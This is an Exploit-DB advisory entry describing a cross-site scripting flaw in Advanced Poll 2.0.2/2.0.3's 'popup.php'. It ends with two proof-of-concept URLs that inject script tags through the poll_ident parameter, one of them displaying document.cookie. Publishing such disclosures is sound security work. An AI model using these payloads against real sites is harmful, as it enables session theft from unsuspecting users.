Advanced Poll 2.0.2/2.0.3 - 'popup.php' Cross-Site Scripting

EDB-ID:

26539

Author:

[GB]

Type:

webapps

Platform:

PHP

Published:

2005-11-21

source: http://www.securityfocus.com/bid/15506/info

Advanced Poll is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. 

http://www.example.com/poll/popup.php?action=results&poll_ident="><script>alert("hola vengo a flotar");</script>

http://www.example.com/poll/popup.php?action=results&poll_ident="><script>alert(document.cookie);</script>